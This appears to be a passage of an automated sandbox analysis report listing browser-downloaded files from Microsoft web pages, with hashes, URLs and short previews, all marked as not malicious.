                                                                                                                                    Preview:#chat-now-link:not(.pmg-chat-active),#chat-button:not(.pmg-chat-active),#pmg-chat-now:not(.pmg-chat-active),#chat-now:not(.pmg-chat-active),#mobile-chat-now:not(.pmg-chat-active){display:none !important}.[data-oc-chat='true'],[data-oc-widget-chat='true'],[data-oc-widget-chat-bot='true']{display:inline-block !important}..proactive-chat-hidden{display:none !important}..lp-iframe-close{display:none}.#lp-iframe-container{border:0;bottom:24px;box-shadow:0 5px 15px 0 rgba(0,0,0,0.25);height:500px;left:auto !important;min-width:300px;max-width:350px;padding:0;position:fixed;right:0;top:auto !important;z-index:1031}.#lp-iframe-container,#lp-iframe-container .lp-iframe-window{border-radius:5px}..lp-live-person .c-flyout{font-size:15px;position:absolute;background:#fff;min-width:128px;max-width:296px;padding:12px;z-index:700;display:none}..lp-live-person [aria-hidden="false"]{display:block}..lp-live-person .lp-iframe-window{border:1px solid transparent;height:500px;width:350px}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 1720 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):13016
                                                                                                                                    Entropy (8bit):7.883155506636877
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:F5B4B4F04F1924F9470DC3C0B3E4FC01
                                                                                                                                    SHA1:28D187B90F70638832771600CD556BC85B418A37
                                                                                                                                    SHA-256:98FB37F9F0DA54BB17E1322E1A49D5D683854A0BD3DE47C01EB3F0CCBB8B2999
                                                                                                                                    SHA-512:676E6866C149E56699CA65887D4DB5903CD6F84D32987215F218082E4E441340931221BDED2A78512DEDF417848379DD7E45BF4F87804BC7FEFF7CB3632CB53B
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://lpcdn.lpsnmedia.net/le_unified_window/10.13.0.5-release_5314/resources/icons/desktop/sprites_v1.png?v=10.13.0.5-release_5314%22%20alt=%22End%20conversation
                                                                                                                                    Preview:.PNG........IHDR.......P.....B.uk....pHYs...........~... .IDATx.....\.u..+{)....b...G9d....hL#....."p-[K.J.6G.;..i4..q.8.0q.vk...QVk#...3.lq...a+....J.....b..vQ....b..)...s..7....w.}.... w~.}3.....k.^.h.....X.z}.a.9<...............-o......c.-..s.Ti.......^x...g_.i...=........\R?0S....sg.....G....o.J.m...].b....u...w.Z...[...}.l...1.~..B...7.\HT?0S...n....y"......z}.^`.4.T....Y......?7w.;..A...X...s..Um..~`..V..G.J,$.5...Mg..#.|...S...O.?..u..7]{....nxK.....?2.<.....N..i...?....=.......q....>..c[..f...#.jG..F.!6.......G.}O.~.*.$..w..+..,....M.>.}....6T$1g?.Z......1.l_5....6.-......-.W.$..B"9!V.q.JCd....G.I.C8...... 4....K....mH....d.&..IT..<.~...,Hp.%.v.@.~.7k......Z.Y......p.^#.....l.35..5I`j'%..1..x.........={.*o....bye..;v..1./~.w[..{@.N...J.mG..z...[w.=x....K....C..\......;....{o....Y..?...K;c..~...u.)m.M...m-.g.}O.MU.7.~._.eK~..UI 6Ht..l6.........F2v....q.zV..TZ..w}v.....h.t...T%..>5.7.$.{A...lsY..2.K..f.b.>....)...K...RL
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (328)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):83790
                                                                                                                                    Entropy (8bit):4.9173035358358055
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:6CFDA6CBA38E1A36956E8F99C51A9CDC
                                                                                                                                    SHA1:D201B50CD26507782770290EB03556695AA5DDD0
                                                                                                                                    SHA-256:6303067888A7FAED3E8AAB486A8CFBA6556C8375CBEDE4E507646C133B17EF58
                                                                                                                                    SHA-512:B1A5BD3C2B80E87E3BA62F77A7004772B94EEA9D2B0EBA5C8659960115AD383174820531D8B85DE578E423C23227605F7096A741DE1237E517B0A598475EF0C8
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-web-components/styles.min.ACSHASH6cfda6cba38e1a36956e8f99c51a9cdc.css
                                                                                                                                    Preview:/*!. * Reimagine WC Theming v11.0.2. * OneCloud Reimagine v0.256.0. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc.. */./* stylelint-disable value-list-comma-space-after */./* stylelint-disable value-list-comma-newline-after */.@font-face {. font-family: MWF-FLUENT-ICONS;. src: url("styles/fonts/MWFFluentIcons.woff2") format("woff2"), url("styles/fonts/MWFFluentIcons.woff") format("woff"), url("styles/fonts/MWFFluentIcons.ttf") format("truetype"); }..@font-face {. font-family: SegoeUI;. src: local("Segoe UI"), url("//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2") format("woff2"), url("//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff") format("woff"), url("//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf") format("ttf");. font-weight: 400; }..@font-face {. font-family: SegoeUI;. src: local("Segoe UI"), url
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (64796)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):600180
                                                                                                                                    Entropy (8bit):5.118133182005812
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:B66691F153FB100D708E3BA31BF274C7
                                                                                                                                    SHA1:90D964F5962CE392997DD58229E03B1C6F95B9B9
                                                                                                                                    SHA-256:908813F23C64E9B5DA1F82C4444D8AEC2A535192794692DDA5A30D5ADE9D150B
                                                                                                                                    SHA-512:4BD653A101A96F24C37F73134673FDE186EC8520F26B14B41682389E8C77AA1B2071BDB8897D3C3F2422590041939DD44A496169FA8FF7AD120DA88D481AE943
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine/main-light.min.ACSHASHb66691f153fb100d708e3ba31bf274c7.css
                                                                                                                                    Preview:@charset "UTF-8";/*!. * OneCloud Reimagine v0.309.0. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc.. */.fixed-back-to-top{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important;pointer-events:none}@media (prefers-reduced-motion:reduce){.fixed-back-to-top{transition:none}}.fixed-back-to-top.fixed-sticky.stuck{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important}@media (prefers-reduced-motion:reduce){.fixed-back-to-top.fixed-sticky.stuck{transition:none}}@media screen and (max-width:540px){.fixed-back-to-top.stuck{position:static}}.fixed-back-to-top .btn{pointer-events:auto}.fixed-sticky{transition:background .2s ease-out,shadow .2s ease-out}.fixed-sticky .sticky-show-stuck{display:none}.fixed-sticky.get-height .sticky-show-stuck{display:block;visibility:hidden;opacity:0;position:fixed;left:-9999px;width:100%}.fixed-sticky.stuck{position:fixed;left:0;right:0;width:100%;z-index:1020;t
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):11743
                                                                                                                                    Entropy (8bit):7.971171069454427
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:A63F7F5CD797BE2171D3586665AE89AC
                                                                                                                                    SHA1:168939BDD1F86545AB8AD4013B3989B726A25591
                                                                                                                                    SHA-256:0C78D2C573B6E9C9D6484B0556C62AD54A96134FA24FA2EFF0935CD19788787C
                                                                                                                                    SHA-512:B89AC46E15A8890927B5FA66DF9C821461042A192F52EF05D52B50AAA0CAA38315B854471F54815668A1016CFD983804E95B39A4986FE812D5795E18C32A71E9
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/full-screen-banner-1600x428?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=428&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............,....(iinf..........infe........av01Color....jiprp...Kipco....ispe.......@........pixi............av1C........colrnclx...........ipma.................,.mdat.....j1.......2.YD......2..f~.Lj.<..#.D..Z..H.....c.......'.....[....8m.....4v. .Z#.e..H..cz.ve..j.............9A.........."..0.C..4.-....]..`=.;.-.5.<.+.Y.....s...c"Y.m\..2..R.|dD..q./.a....ky.zR..`J6...-..Y......S....C.Z..]...~..1g{p7....-Y.*USqQ..b.."K....O:..s.1.F.l.4./.../..Hl\...2A..7GI..\iH.B...rU=.6...6.....`'...n....b...u.......M}Am.....r..._3....o..z.!.";......2...X.....:[Ym...@^..<.m.-..C.G..bw..R.*$.Ed....!1g.3...7..xm..x..n...........i.K.....Z..k..\.j...i....f..?A......+O.....@....1TG..U...T..|r.;......../:.Z.,.Na.cL..PR......x..vN.L.?.#.m..%]2...=.E..V....................k.......2.>.......\..bE....`.I...8..v#...V^.@.5t...n........m.b.....:..m.>v...
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (678)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):5243
                                                                                                                                    Entropy (8bit):5.395959363705534
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:3DB5CF9FD3FAB92B3889302C8DE78D1B
                                                                                                                                    SHA1:1C493C13BC775036B36ACBA37941375ED0CE2ADA
                                                                                                                                    SHA-256:D29DB6171FCF5458896561430C466007D6E9709F83DF0CB950E273B93DDA7853
                                                                                                                                    SHA-512:1B13D7AA880D8987B5120FB6BB21CE53F6FB7769061E35C2BB87B59F32F176D52FC7F208461A7603EDCE26318E022B75F2CB27791C5D7A7D826B2C141D33AA70
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-cookievalidator.min.ACSHASH3db5cf9fd3fab92b3889302c8de78d1b.js
                                                                                                                                    Preview:'use strict';(function(){function q(){return new Promise(function(e){window.oa=window.oa||{load:!0};(function(h,k){function m(b){b+="\x3d";for(var f=decodeURIComponent(h.cookie).split(";"),g=0;g<f.length;g++){for(var a=f[g];" "===a.charAt(0);)a=a.substring(1);if(0===a.indexOf(b))return a.substring(b.length,a.length)}return""}function p(b,f){if("function"===typeof b[3])b[3](b);var g=f.createElement("script");g.type="text/javascript";g.src=b[1];g.async=b[2];g.addEventListener("load",function(){b[4](b);.e()});g.addEventListener("readystatechange",function(){"complete"===this.readyState&&b[4](b)});if(b[8])b[8]();f.getElementsByTagName("head")[0].appendChild(g)}window.oa.container||(window.oa.container=!0,!function(b,f,g,a){for(var d=f.getElementsByTagName("script"),c=0;c<b.length;c++){var l=a(g.location.search.toLowerCase(),f.cookie),n=b[c];if(-1===Array.prototype.indexOf.call(d,f.location.protocol+n[1])&&n[6]&&n[0].test(f.location.href)){if(l!==n[5]&&null!==n[5]||m("bp_"+n[7].split(" ").j
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (64796)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):601590
                                                                                                                                    Entropy (8bit):5.1132841149611625
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:5851A3C4533D1BE9266FAAD8E3026BF4
                                                                                                                                    SHA1:304586BE355757BD34C1676E6832776C4CD252FF
                                                                                                                                    SHA-256:3D315E173769914507E72E4F2AA9ECEEB466975F709FC1176906F61A2DDBD308
                                                                                                                                    SHA-512:9BE562E48B228E8315B079BB4A3349AD99B29B0C5BF1F370FEAF5BC41B59E30F27B1944B521A60C13BFA5C9E338B206F27709B5A283C7CE4BB1D04849CA504E4
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine/main-power-platform-all-up.min.ACSHASH5851a3c4533d1be9266faad8e3026bf4.css
                                                                                                                                    Preview:@charset "UTF-8";/*!. * OneCloud Reimagine v0.309.0. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc.. */.fixed-back-to-top{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important;pointer-events:none}@media (prefers-reduced-motion:reduce){.fixed-back-to-top{transition:none}}.fixed-back-to-top.fixed-sticky.stuck{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important}@media (prefers-reduced-motion:reduce){.fixed-back-to-top.fixed-sticky.stuck{transition:none}}@media screen and (max-width:540px){.fixed-back-to-top.stuck{position:static}}.fixed-back-to-top .btn{pointer-events:auto}.fixed-sticky{transition:background .2s ease-out,shadow .2s ease-out}.fixed-sticky .sticky-show-stuck{display:none}.fixed-sticky.get-height .sticky-show-stuck{display:block;visibility:hidden;opacity:0;position:fixed;left:-9999px;width:100%}.fixed-sticky.stuck{position:fixed;left:0;right:0;width:100%;z-index:1020;t
                                                                                                                                    No static file info